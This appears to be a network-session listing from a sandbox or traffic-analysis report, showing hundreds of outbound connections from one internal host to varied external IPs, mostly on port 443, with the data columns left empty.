                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26329192.168.2.2357688149.115.119.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26330192.168.2.235478236.72.177.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26331192.168.2.2342456138.13.86.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26332192.168.2.2343456161.157.221.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26333192.168.2.2342218223.70.164.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26334192.168.2.234740224.5.228.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26335192.168.2.235799683.122.152.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26336192.168.2.234976482.157.36.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26337192.168.2.2359752136.221.30.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26338192.168.2.2356642164.84.94.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26339192.168.2.234593077.166.164.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26340192.168.2.2333652180.147.92.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26341192.168.2.2360112168.152.208.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26342192.168.2.2358072123.116.56.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26343192.168.2.2357080110.250.114.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26344192.168.2.2346800129.18.91.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26345192.168.2.2347076137.119.111.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26346192.168.2.235883895.126.200.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26347192.168.2.2347522209.164.38.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26348192.168.2.234150437.131.141.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26349192.168.2.234967225.125.253.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26350192.168.2.2360180216.166.130.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26351192.168.2.2335524213.116.153.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26352192.168.2.2345912157.76.89.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26353192.168.2.233519017.171.204.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26354192.168.2.2358994158.246.193.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26355192.168.2.2345126181.138.230.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26356192.168.2.2359144206.210.188.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26357192.168.2.234547220.5.232.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26358192.168.2.233445083.165.40.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26359192.168.2.2360578101.29.54.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26360192.168.2.235488619.68.161.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26361192.168.2.2356896156.172.184.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26362192.168.2.235083876.160.236.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26363192.168.2.2337330217.194.79.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26364192.168.2.233577639.217.209.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26365192.168.2.234414482.142.210.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26366192.168.2.233666468.185.176.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26367192.168.2.235240088.37.199.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26368192.168.2.234680461.47.128.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26369192.168.2.234662057.132.199.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26370192.168.2.2335988151.180.129.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26371192.168.2.2347196124.23.64.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26372192.168.2.2345782123.103.143.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26373192.168.2.2351756202.50.61.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26374192.168.2.2354920129.107.168.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26375192.168.2.236092859.158.18.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26376192.168.2.234683291.79.250.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26377192.168.2.2349552116.66.250.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26378192.168.2.2335516113.90.130.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26379192.168.2.2345776216.3.0.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26380192.168.2.2338278136.40.33.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26381192.168.2.2336612111.81.55.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26382192.168.2.233893638.255.47.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26383192.168.2.2355876155.170.86.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26384192.168.2.2346280160.213.182.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26385192.168.2.234076846.201.120.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26386192.168.2.233491882.181.216.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26387192.168.2.2340236220.68.232.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26388192.168.2.2350522154.129.51.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26389192.168.2.2348752204.86.173.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26390192.168.2.2356698139.64.233.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26391192.168.2.235613259.77.165.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26392192.168.2.2351378126.127.84.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26393192.168.2.234383659.177.68.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26394192.168.2.2348724120.108.252.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26395192.168.2.2338642212.112.41.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26396192.168.2.2352342161.254.10.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26397192.168.2.23447965.6.99.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26398192.168.2.2339272162.98.24.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26399192.168.2.2349658125.113.123.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26400192.168.2.2343410140.64.236.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26401192.168.2.234741070.128.138.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26402192.168.2.235762892.88.80.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26403192.168.2.234211278.33.139.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26404192.168.2.2352178158.20.40.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26405192.168.2.23350905.105.51.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26406192.168.2.23459681.143.84.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26407192.168.2.2359142116.231.208.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26408192.168.2.235212663.29.73.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26409192.168.2.2353936102.19.226.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26410192.168.2.2356934212.205.145.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26411192.168.2.2340454137.195.26.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26412192.168.2.234524237.224.44.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26413192.168.2.2332770171.93.122.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26414192.168.2.234609077.182.41.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26415192.168.2.2340158112.90.67.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26416192.168.2.2332796156.178.215.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26417192.168.2.2349458131.178.1.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26418192.168.2.23568381.12.34.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26419192.168.2.2347896181.44.227.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26420192.168.2.23443901.74.16.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26421192.168.2.234415288.234.4.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26422192.168.2.234224082.190.184.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26423192.168.2.2347784140.220.154.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26424192.168.2.234333895.149.113.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26425192.168.2.23443725.216.152.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26426192.168.2.2347322162.24.118.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26427192.168.2.234508881.57.69.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26428192.168.2.234104098.146.80.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26429192.168.2.234711089.127.29.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26430192.168.2.233299224.116.59.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26431192.168.2.2348062156.123.49.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26432192.168.2.2350396220.154.3.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26433192.168.2.233836890.45.112.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26434192.168.2.233863667.111.230.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26435192.168.2.233302058.191.251.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26436192.168.2.235904453.6.242.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26437192.168.2.2358034140.25.217.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26438192.168.2.234381683.233.102.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26439192.168.2.2340862212.160.154.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26440192.168.2.2337058132.37.125.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26441192.168.2.235945478.54.107.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26442192.168.2.23582622.213.182.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26443192.168.2.235393292.199.117.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26444192.168.2.2359052170.81.148.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26445192.168.2.2335882171.26.35.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26446192.168.2.2351870173.110.185.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26447192.168.2.2340724110.224.44.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26448192.168.2.2340332131.237.223.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26449192.168.2.2343376169.156.230.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26450192.168.2.234835498.254.121.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26451192.168.2.2356244152.203.18.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26452192.168.2.2347746116.99.104.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26453192.168.2.2359330206.19.125.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26454192.168.2.235683640.59.216.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26455192.168.2.2342270187.50.219.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26456192.168.2.2343460133.4.251.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26457192.168.2.2340564181.82.31.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26458192.168.2.2346664159.19.13.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26459192.168.2.2345636104.92.4.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26460192.168.2.2333260128.116.86.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26461192.168.2.233696859.53.250.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26462192.168.2.235980023.18.57.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26463192.168.2.2344826186.176.201.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26464192.168.2.2358696148.234.96.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26465192.168.2.2346300152.44.31.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26466192.168.2.2338108153.137.142.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26467192.168.2.2335014168.47.183.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26468192.168.2.2348270161.181.35.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26469192.168.2.23435365.196.30.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26470192.168.2.234274847.81.179.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26471192.168.2.234482276.150.244.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26472192.168.2.2338570221.164.26.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26473192.168.2.233698280.51.229.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26474192.168.2.234310459.128.136.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26475192.168.2.2339290119.102.140.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26476192.168.2.233712278.137.180.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26477192.168.2.2347660113.151.155.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26478192.168.2.234807689.229.45.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26479192.168.2.234678290.232.165.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26480192.168.2.235614242.86.43.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26481192.168.2.2359288113.211.119.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26482192.168.2.2347664159.221.117.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26483192.168.2.2360196162.82.203.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26484192.168.2.234603837.203.11.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26485192.168.2.2347834177.112.191.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26486192.168.2.2337908183.127.219.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26487192.168.2.2334566149.178.201.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26488192.168.2.2337374114.241.144.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26489192.168.2.234129040.14.172.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26490192.168.2.2352278115.27.140.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26491192.168.2.234633486.111.167.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26492192.168.2.234288670.12.161.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26493192.168.2.234470484.208.188.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26494192.168.2.234128063.252.106.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26495192.168.2.235068671.155.251.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26496192.168.2.2333988146.26.149.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26497192.168.2.2344490187.50.102.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26498192.168.2.2337318157.122.72.16137215
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26499192.168.2.2352886158.255.170.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26500192.168.2.235905265.241.247.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26501192.168.2.2356314136.165.214.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26502192.168.2.2357128110.34.209.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26503192.168.2.2351894142.36.13.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26504192.168.2.2342738173.229.159.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26505192.168.2.2346222128.62.84.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26506192.168.2.233363634.132.183.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26507192.168.2.2333502166.34.146.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26508192.168.2.2335394122.228.71.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26509192.168.2.234934849.118.119.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26510192.168.2.2335790218.96.120.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26511192.168.2.2343216204.49.68.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26512192.168.2.2334068181.198.29.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26513192.168.2.234575213.235.222.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26514192.168.2.2358114113.0.132.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26515192.168.2.234667840.98.29.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26516192.168.2.234879249.219.225.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26517192.168.2.2358102156.213.189.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26518192.168.2.2358980210.221.103.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26519192.168.2.234218239.110.193.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26520192.168.2.2353240203.93.169.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26521192.168.2.2346026221.247.47.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26522192.168.2.2354638193.46.186.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26523192.168.2.233515869.42.144.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26524192.168.2.235477234.63.232.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26525192.168.2.2341532211.16.68.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26526192.168.2.235764466.210.23.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26527192.168.2.2360906105.89.84.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26528192.168.2.2355928113.154.54.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26529192.168.2.234910240.181.1.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26530192.168.2.234909262.127.141.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26531192.168.2.233490876.215.57.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26532192.168.2.23355042.26.239.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26533192.168.2.2358962212.239.196.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26534192.168.2.2344788123.203.119.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26535192.168.2.235328613.145.231.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26536192.168.2.2347926194.98.232.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26537192.168.2.233580873.200.77.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26538192.168.2.2359266120.138.12.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26539192.168.2.233543812.222.124.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26540192.168.2.234421692.215.27.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26541192.168.2.2337014132.17.69.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26542192.168.2.2355634213.241.241.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26543192.168.2.2350874151.58.159.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26544192.168.2.2356580186.155.35.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26545192.168.2.2345850222.221.246.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26546192.168.2.235500898.187.28.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26547192.168.2.2333574147.69.148.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26548192.168.2.234506296.195.149.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26549192.168.2.234092420.83.81.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26550192.168.2.2346580221.248.199.170443
